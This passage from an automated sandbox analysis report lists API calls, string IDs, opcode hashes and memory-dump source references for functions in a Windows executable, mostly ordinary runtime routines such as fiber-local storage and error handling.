                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A877
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f006d7668b7285f7a8b0ef8f9238af911d137d0fc7933ef2d874b855d1a2d336
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60d45a4764403a5d0ddd82e5d68a761cff8a2efcee26f5de70b7619e0ff2c277
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f006d7668b7285f7a8b0ef8f9238af911d137d0fc7933ef2d874b855d1a2d336
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5116D22E1C26282FB185732965137932429F4A7B0F04A334D86FC77D6FF2EA403620A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                                  • String ID: csm$f
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9bd81ab71339c7c30171ecb5ccdb15a6565734544de6f67a592d40a772cfc564
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE511837A1960187D714CF55D408B293355FB46B84F919132DE0E87748DFBAE853E709
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c77eb6da1437d11355308ffd2f8c7ab1623b37de00385a783310635bce07de12
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bc9356f0420e98523a771ede3dcd960811594abad977f5d16124173a89d5cc5e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c77eb6da1437d11355308ffd2f8c7ab1623b37de00385a783310635bce07de12
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8731B333A08A8289EB24EF61E8442FA7360FF8A784F401131EA4D8BB55DF3DD151D705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E1B37774,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B32654
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B374E0: GetLastError.KERNEL32(00000000,00007FF6E1B3269E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B37507
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B374E0: FormatMessageW.KERNEL32 ref: 00007FF6E1B37536
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B37A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E1B326FB), ref: 00007FF6E1B37A9A
                                                                                                                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF6E1B32730
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32 ref: 00007FF6E1B3274C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 443636ddf8835f8f78a720eb83657c91f9726df17b09b176107b89e3f0788d34
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F31C27362868282E730DB20E4507EA7364FF85784F806032E68D83A99DF7DD356DB44
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d41a2f0d8bb19c195751789e682b9e71c71445076e22a83aa8394c67bafdbed8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0F667B19A0681EB108B64E4443393721EF8B7A5F482335C66DD52F0DF3ED089E30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cb9dbeae88cbbd2830bbbe6951ebbe87ee54d820fa74aed7367a80bbde86ef27
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98118223E18A0355F7542367F4423793043EF5B364F142A34EA6E862D6DE2EA8C1A10B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B4A8AF
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B4A8CE
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B4A8F6
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B4A907
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B49AA3,?,?,00000000,00007FF6E1B49D3E,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B4A918
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: decd09c5d13d42fca7703fcba7a9597a87235a4441fb2811ed88c6e0bb3316ef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 98be17c803c679c551910567e06027ff715e93e22469e8a55f5c4f0769a94dd6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: decd09c5d13d42fca7703fcba7a9597a87235a4441fb2811ed88c6e0bb3316ef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11AF26F1C65241FB58A336955137932515F9A3A0F08A334E87EC67D6FF2EA443A20B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F), ref: 00007FF6E1B4A735
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F), ref: 00007FF6E1B4A754
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F), ref: 00007FF6E1B4A77C
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F), ref: 00007FF6E1B4A78D
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F), ref: 00007FF6E1B4A79E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9dcc94c0073ee170a57e1df73e5138f0fc39046db5921ae8275996bd67e22a2a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bddca4bd204112f8745debbaf2783713447ba0461a7d0b74065a2d7250ac33f5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dcc94c0073ee170a57e1df73e5138f0fc39046db5921ae8275996bd67e22a2a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6111C22A5C21741FB78A23284113B931524F5B764F08A734D93FCA2C2FE2EB443625B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
